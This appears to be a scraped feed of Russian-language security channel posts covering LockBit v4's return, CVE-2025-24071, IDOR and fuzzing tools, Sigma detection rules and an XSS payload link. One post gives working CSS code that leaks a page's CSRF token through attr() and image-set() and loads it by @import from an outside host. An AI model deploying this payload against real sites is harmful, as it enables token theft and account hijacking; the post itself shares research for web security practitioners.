#Beacon

Прожаренный цуберпохек

[educational channel/white hat only] – do not try the knowledge from here on your home or other people’s microwaves

Recent Posts

как сказали классики: нет cve - нет уязвимостей(где-то из-за угла выскакивает бду - https://bdu.fstec.ru/ но мы не байтимся, по крайне мере сразу, ну если только битрикс нужно проверить)😁
Легендарная в индустрии ransomware банда Lockbit возрождается вопреки предпринятым в прошлом году международным операциям спецслужб США и Великобритании по нейтрализации инфраструктуры и задержанию ее членов.

Силовикам, безусловно, удалось изрядно потрепать бизнес вымогателей LockBit, которые, из-под санкций, согласно многочисленным сообщениям, смогли официально вернуться в строй.

Новая RaaS теперь отслеживается исследователями как LockBit v4 или LockBit Green и уже обзавелась новыми жертвами.

Конечно, темп еще нет тот, как когда-то был (более 30 выкупов за день), но обороты нарастают, операторы подтягиваются.

Насколько быстро Lockbit выйдет в рабочий ритм, будем посмотреть.
тем временем:
Вчера как обычно сделал обычный пост в соц сети Илона Маска, который довольно сильно разошелся. Поэтому для тех кто читает только мой тг повторю тут.

Думаю многие знакомы с CSS exfiltration, а если нет можете прочитать статью 2 летней давности на portswigger
Основная идея тогда заключалась в том, чтобы с помощью CSS селекторов брутфорсить атрибуты тегов:
input[value^="a"] {
--starts-with-a:url(/startsWithA);
}

Например так можно украсть CSRF токен, однако атака довольно нестабильная, медленная и тд. Довольно плохо реализуема.

Однако я обнаружил, что начиная с Chrome 133 произошло важное изменение в функции CSS attr, раньше она могла использоваться только с content property, теперь же вы можете использовать её вместе с переменными CSS (https://developer.chrome.com/blog/advanced-attr):
form {
--val: attr(csrf-token);
}

--val будет содержать содержать значение атрибута csrf-token
Однако мы не можем использовать такое внутри url:
form {
--val: attr(csrf-token);
background: url(var(--val)); /* Correct */
}

Браузер просто проигнорирует такой property как неверный
Однако на помощь опять спешат новые стандарты CSS, чтобы добиться успеха достаточно использовать image-set
form {
--val: attr(csrf-token);
background: image-set(var(--val)); /* Correct */
}

После чего просто сохраняете стиль с кражей нужного поля (например атрибута value у тега input с именем csrf-token)
И делаете @import с атакуемой страницы :
 @import url(https://pocs.neplox.security/css-2025-exfiltration.css);

После чего, как можно увидеть на скриншоте, через один запрос вы получите полное значение атрибута тега
Разбор CVE-2025-24071 от BIZONE
#CVE-2025-24071 #BIZONE#Windows#Microsoft#NetNTLMv2

Статья от Ильи Ефимова, ведущего аналитика SOC компании BI.ZONE. В этой статье он расскажет о нашумевшей CVE-2025-24071, которая позволяет атакующим получить NetNTLMv2-хеш-суммы паролей в результате некорректной обработки файлов .library-ms в Windows Explorer. Сама уязвимость уже эксплуатируется in-the-wild, о чем свидетельствуют данные, полученные от исследователей в области кибербезопасности. В своем небольшом исследовании он покажет, за счет чего происходит эксплуатация уязвимости, примеры событий, а также расскажет, как обнаружить такую активность.

Что такое .library-ms-файл
Начнем с того, что собой представляет файл .library-ms. Исходя из документации Microsoft, .library-ms-файлы — это XML-файлы, которые определяют библиотеки Windows (Windows Libraries) — специальные виртуальные коллекции папок и файлов, представленные в проводнике.

🔗Читать дальше

🌚@poxek | 🌚blog.poxek.cc | 📺YT | 📺RT | 📺VK | 🌚Магазин мерча
Check_Sheet_of_Information_Security_Management_Guidelines_for_Business_Partner_en.pdf
#web#pentest

IDOR Forge

IDOR Forge - это мощный и универсальный инструмент, предназначенный для обнаружения уязвимостей Insecure Direct Object Reference (IDOR) в веб-приложениях.

Уязвимости IDOR возникают, когда приложение раскрывает прямые ссылки на внутренние объекты (например, ключи баз данных, пути к файлам) без надлежащей проверки авторизации, что позволяет злоумышленникам получить несанкционированный доступ к данным.

Этот инструмент автоматизирует процесс выявления таких уязвимостей, динамически генерируя и тестируя полезную нагрузку, анализируя ответы и сообщая о потенциальных проблемах.
🕷Автоматизируем фаззинг с ffufai

Если вы активно используете ffuf для фаззинга директорий и файлов, попробуйте ИИ-помощник ffufai для автоматизации процесса.

➡️Что умеет:

⭕️ Анализирует URL и заголовки
⭕️ Предлагает релевантные расширения для фаззинга на основе ИИ (GPT или Claude)
⭕️ Экономит время на подбор расширений и помогает находить скрытые точки входа

Инструмент полностью совместим с ffuf и работает с привычными параметрами — ничего не нужно менять в вашем воркфлоу.

👉Попробуйте на следующем багбаунти-проекте

#инструменты#разведка
ТЕХНОЛОГИЯ ВЫЯВЛЕНИЯ НЕДЕКЛАРИРОВАННЫХ
ВОЗМОЖНОСТЕЙ ПРИ СЕРТИФИКАЦИИ
ПРОМЫШЛЕННОГО ПРОГРАММНОГО ОБЕСПЕЧЕНИЯ
Недавно мне попался интересный проект AttackRuleMap, который представляет собой маппинг тест-кейсов инструмента Atomic Red Team и соответствующих правил обнаружения в формате Sigma. Данный ресурс может быть очень полезен, чтобы обеспечить покрытие алертами большей части техник MITRE, особенно на ранних этапах уровня зрелости команды Detection Engineering.

Но далеко не все SIEM из коробки поддерживают этот универсальный формат для пра­вил обнаружения, поэтому если у вас в компании изпользуется, например Elastic SIEM, то потребуется конвертировать правила в KQL (Kibana Query Language) и EQL (Event Query Language).

Реализовать данную задачу можно с помощью pySigma и Sigma CLI, которые пришли на смену Sigmac. Раньше был еще онлайн-конвертер uncoder.io (на данный момент ресурс по какой-то причине лежит🤷‍♂️), который позволял просто в веб-интерфейсе конвертировать Sigma правила для выбранного SIEM (включая Elastic KQL, Elastic EQL).
При этом существуют некоторые недостатки связанные с конвертацией правил, которые описаны в этой статье.

Но тем не менее, мне кажется, это хорошая отправная точка для старта, когда в первую очередь необходимо обеспечить максимально возможное покрытие стандартных техник и процедур злоумышленников в короткие сроки😎
Когда решил поиграть с нейронкой и напомнить ее роль...

Идея василиска как воплощения мифического опасного для человечества искусственного интеллекта была предложена в 2010 году на форуме LessWrong Элиезера Юдковского участником под ником Roko.
10 лучших полезных нагрузок XSS
https://readmedium.com/top-10-xss-payloads-e4774a43e285
Когда переборщил с нейронкой и она придумала во время диалога обуждения ctf себе личность....
О скрытии сообщений в эмодзи и взломе казначейства США

#статья#перевод#взлом#SQLi

30 декабря 2024 года, пока большинство из нас суетились в преддверии празднования Нового года, Казначейство США готовило для Финансового комитета Сената США важное уведомление. В нём сообщалось, что его системы, которые, очевидно, содержат особо чувствительные конфиденциальные данные, были взломаны группой правительственных хакеров Китая. И это ещё не самое безумное. Сейчас я расскажу вам, как именно они это сделали!

🔗Ссылка на статью

LH | News | OSINT | AI
See more posts